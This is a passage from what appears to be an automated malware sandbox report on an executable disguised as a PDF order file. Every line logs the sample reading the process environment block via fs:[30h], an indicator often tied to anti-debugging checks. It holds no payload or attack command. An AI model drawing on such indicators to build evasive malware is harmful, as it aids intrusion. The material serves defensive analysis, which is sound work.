Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]	4_2_011D62A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]	4_2_011D62A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D62A0 mov eax, dword ptr fs:[00000030h]	4_2_011D62A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0114A2C3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0114A2C3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0114A2C3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0114A2C3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114A2C3 mov eax, dword ptr fs:[00000030h]	4_2_0114A2C3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011502E1 mov eax, dword ptr fs:[00000030h]	4_2_011502E1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011502E1 mov eax, dword ptr fs:[00000030h]	4_2_011502E1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011502E1 mov eax, dword ptr fs:[00000030h]	4_2_011502E1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D6500 mov eax, dword ptr fs:[00000030h]	4_2_011D6500
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]	4_2_01150535
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]	4_2_01150535
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]	4_2_01150535
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]	4_2_01150535
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]	4_2_01150535
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150535 mov eax, dword ptr fs:[00000030h]	4_2_01150535
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]	4_2_01214500
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]	4_2_01214500
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]	4_2_01214500
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]	4_2_01214500
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]	4_2_01214500
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]	4_2_01214500
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01214500 mov eax, dword ptr fs:[00000030h]	4_2_01214500
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]	4_2_0116E53E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]	4_2_0116E53E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]	4_2_0116E53E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]	4_2_0116E53E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E53E mov eax, dword ptr fs:[00000030h]	4_2_0116E53E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01148550 mov eax, dword ptr fs:[00000030h]	4_2_01148550
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01148550 mov eax, dword ptr fs:[00000030h]	4_2_01148550
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117656A mov eax, dword ptr fs:[00000030h]	4_2_0117656A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117656A mov eax, dword ptr fs:[00000030h]	4_2_0117656A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117656A mov eax, dword ptr fs:[00000030h]	4_2_0117656A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E59C mov eax, dword ptr fs:[00000030h]	4_2_0117E59C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01142582 mov eax, dword ptr fs:[00000030h]	4_2_01142582
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01142582 mov ecx, dword ptr fs:[00000030h]	4_2_01142582
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01174588 mov eax, dword ptr fs:[00000030h]	4_2_01174588
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011645B1 mov eax, dword ptr fs:[00000030h]	4_2_011645B1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011645B1 mov eax, dword ptr fs:[00000030h]	4_2_011645B1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C05A7 mov eax, dword ptr fs:[00000030h]	4_2_011C05A7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C05A7 mov eax, dword ptr fs:[00000030h]	4_2_011C05A7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C05A7 mov eax, dword ptr fs:[00000030h]	4_2_011C05A7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011465D0 mov eax, dword ptr fs:[00000030h]	4_2_011465D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0117A5D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0117A5D0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E5CF mov eax, dword ptr fs:[00000030h]	4_2_0117E5CF
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E5CF mov eax, dword ptr fs:[00000030h]	4_2_0117E5CF
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0116E5E7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0116E5E7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0116E5E7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0116E5E7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0116E5E7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0116E5E7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0116E5E7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0116E5E7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011425E0 mov eax, dword ptr fs:[00000030h]	4_2_011425E0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117C5ED mov eax, dword ptr fs:[00000030h]	4_2_0117C5ED
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117C5ED mov eax, dword ptr fs:[00000030h]	4_2_0117C5ED
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01178402 mov eax, dword ptr fs:[00000030h]	4_2_01178402
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01178402 mov eax, dword ptr fs:[00000030h]	4_2_01178402
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01178402 mov eax, dword ptr fs:[00000030h]	4_2_01178402
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A430 mov eax, dword ptr fs:[00000030h]	4_2_0117A430
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113E420 mov eax, dword ptr fs:[00000030h]	4_2_0113E420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113E420 mov eax, dword ptr fs:[00000030h]	4_2_0113E420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113E420 mov eax, dword ptr fs:[00000030h]	4_2_0113E420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113C427 mov eax, dword ptr fs:[00000030h]	4_2_0113C427
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]	4_2_011C6420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]	4_2_011C6420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]	4_2_011C6420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]	4_2_011C6420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]	4_2_011C6420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]	4_2_011C6420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C6420 mov eax, dword ptr fs:[00000030h]	4_2_011C6420
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FA456 mov eax, dword ptr fs:[00000030h]	4_2_011FA456
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116245A mov eax, dword ptr fs:[00000030h]	4_2_0116245A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113645D mov eax, dword ptr fs:[00000030h]	4_2_0113645D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]	4_2_0117E443
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]	4_2_0117E443
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]	4_2_0117E443
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]	4_2_0117E443
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]	4_2_0117E443
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]	4_2_0117E443
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]	4_2_0117E443
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E443 mov eax, dword ptr fs:[00000030h]	4_2_0117E443
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116A470 mov eax, dword ptr fs:[00000030h]	4_2_0116A470
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116A470 mov eax, dword ptr fs:[00000030h]	4_2_0116A470
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116A470 mov eax, dword ptr fs:[00000030h]	4_2_0116A470
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CC460 mov ecx, dword ptr fs:[00000030h]	4_2_011CC460
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FA49A mov eax, dword ptr fs:[00000030h]	4_2_011FA49A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011744B0 mov ecx, dword ptr fs:[00000030h]	4_2_011744B0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CA4B0 mov eax, dword ptr fs:[00000030h]	4_2_011CA4B0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011464AB mov eax, dword ptr fs:[00000030h]	4_2_011464AB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011404E5 mov ecx, dword ptr fs:[00000030h]	4_2_011404E5
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140710 mov eax, dword ptr fs:[00000030h]	4_2_01140710
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01170710 mov eax, dword ptr fs:[00000030h]	4_2_01170710
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117C700 mov eax, dword ptr fs:[00000030h]	4_2_0117C700
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117273C mov eax, dword ptr fs:[00000030h]	4_2_0117273C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117273C mov ecx, dword ptr fs:[00000030h]	4_2_0117273C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117273C mov eax, dword ptr fs:[00000030h]	4_2_0117273C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BC730 mov eax, dword ptr fs:[00000030h]	4_2_011BC730
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117C720 mov eax, dword ptr fs:[00000030h]	4_2_0117C720
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117C720 mov eax, dword ptr fs:[00000030h]	4_2_0117C720
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CE75D mov eax, dword ptr fs:[00000030h]	4_2_011CE75D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140750 mov eax, dword ptr fs:[00000030h]	4_2_01140750
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182750 mov eax, dword ptr fs:[00000030h]	4_2_01182750
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182750 mov eax, dword ptr fs:[00000030h]	4_2_01182750
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C4755 mov eax, dword ptr fs:[00000030h]	4_2_011C4755
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117674D mov esi, dword ptr fs:[00000030h]	4_2_0117674D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117674D mov eax, dword ptr fs:[00000030h]	4_2_0117674D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117674D mov eax, dword ptr fs:[00000030h]	4_2_0117674D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01148770 mov eax, dword ptr fs:[00000030h]	4_2_01148770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770 mov eax, dword ptr fs:[00000030h]	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E678E mov eax, dword ptr fs:[00000030h]	4_2_011E678E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011407AF mov eax, dword ptr fs:[00000030h]	4_2_011407AF
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F47A0 mov eax, dword ptr fs:[00000030h]	4_2_011F47A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114C7C0 mov eax, dword ptr fs:[00000030h]	4_2_0114C7C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C07C3 mov eax, dword ptr fs:[00000030h]	4_2_011C07C3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011447FB mov eax, dword ptr fs:[00000030h]	4_2_011447FB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011447FB mov eax, dword ptr fs:[00000030h]	4_2_011447FB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011627ED mov eax, dword ptr fs:[00000030h]	4_2_011627ED
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011627ED mov eax, dword ptr fs:[00000030h]	4_2_011627ED
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011627ED mov eax, dword ptr fs:[00000030h]	4_2_011627ED
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CE7E1 mov eax, dword ptr fs:[00000030h]	4_2_011CE7E1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01182619 mov eax, dword ptr fs:[00000030h]	4_2_01182619
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE609 mov eax, dword ptr fs:[00000030h]	4_2_011BE609
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]	4_2_0115260B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]	4_2_0115260B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]	4_2_0115260B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]	4_2_0115260B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]	4_2_0115260B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]	4_2_0115260B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115260B mov eax, dword ptr fs:[00000030h]	4_2_0115260B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115E627 mov eax, dword ptr fs:[00000030h]	4_2_0115E627
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01176620 mov eax, dword ptr fs:[00000030h]	4_2_01176620
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01178620 mov eax, dword ptr fs:[00000030h]	4_2_01178620
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114262C mov eax, dword ptr fs:[00000030h]	4_2_0114262C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120866E mov eax, dword ptr fs:[00000030h]	4_2_0120866E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120866E mov eax, dword ptr fs:[00000030h]	4_2_0120866E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115C640 mov eax, dword ptr fs:[00000030h]	4_2_0115C640
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01172674 mov eax, dword ptr fs:[00000030h]	4_2_01172674
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A660 mov eax, dword ptr fs:[00000030h]	4_2_0117A660
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A660 mov eax, dword ptr fs:[00000030h]	4_2_0117A660
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01144690 mov eax, dword ptr fs:[00000030h]	4_2_01144690
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01144690 mov eax, dword ptr fs:[00000030h]	4_2_01144690
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011766B0 mov eax, dword ptr fs:[00000030h]	4_2_011766B0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117C6A6 mov eax, dword ptr fs:[00000030h]	4_2_0117C6A6
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A6C7 mov ebx, dword ptr fs:[00000030h]	4_2_0117A6C7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117A6C7 mov eax, dword ptr fs:[00000030h]	4_2_0117A6C7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE6F2 mov eax, dword ptr fs:[00000030h]	4_2_011BE6F2
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE6F2 mov eax, dword ptr fs:[00000030h]	4_2_011BE6F2
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE6F2 mov eax, dword ptr fs:[00000030h]	4_2_011BE6F2
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE6F2 mov eax, dword ptr fs:[00000030h]	4_2_011BE6F2
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C06F1 mov eax, dword ptr fs:[00000030h]	4_2_011C06F1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C06F1 mov eax, dword ptr fs:[00000030h]	4_2_011C06F1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01138918 mov eax, dword ptr fs:[00000030h]	4_2_01138918
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01138918 mov eax, dword ptr fs:[00000030h]	4_2_01138918
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CC912 mov eax, dword ptr fs:[00000030h]	4_2_011CC912
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE908 mov eax, dword ptr fs:[00000030h]	4_2_011BE908
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BE908 mov eax, dword ptr fs:[00000030h]	4_2_011BE908
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C892A mov eax, dword ptr fs:[00000030h]	4_2_011C892A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011D892B mov eax, dword ptr fs:[00000030h]	4_2_011D892B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C0946 mov eax, dword ptr fs:[00000030h]	4_2_011C0946
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CC97C mov eax, dword ptr fs:[00000030h]	4_2_011CC97C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E4978 mov eax, dword ptr fs:[00000030h]	4_2_011E4978
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E4978 mov eax, dword ptr fs:[00000030h]	4_2_011E4978
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01166962 mov eax, dword ptr fs:[00000030h]	4_2_01166962
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01166962 mov eax, dword ptr fs:[00000030h]	4_2_01166962
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01166962 mov eax, dword ptr fs:[00000030h]	4_2_01166962
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0118096E mov eax, dword ptr fs:[00000030h]	4_2_0118096E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0118096E mov edx, dword ptr fs:[00000030h]	4_2_0118096E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0118096E mov eax, dword ptr fs:[00000030h]	4_2_0118096E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C89B3 mov esi, dword ptr fs:[00000030h]	4_2_011C89B3
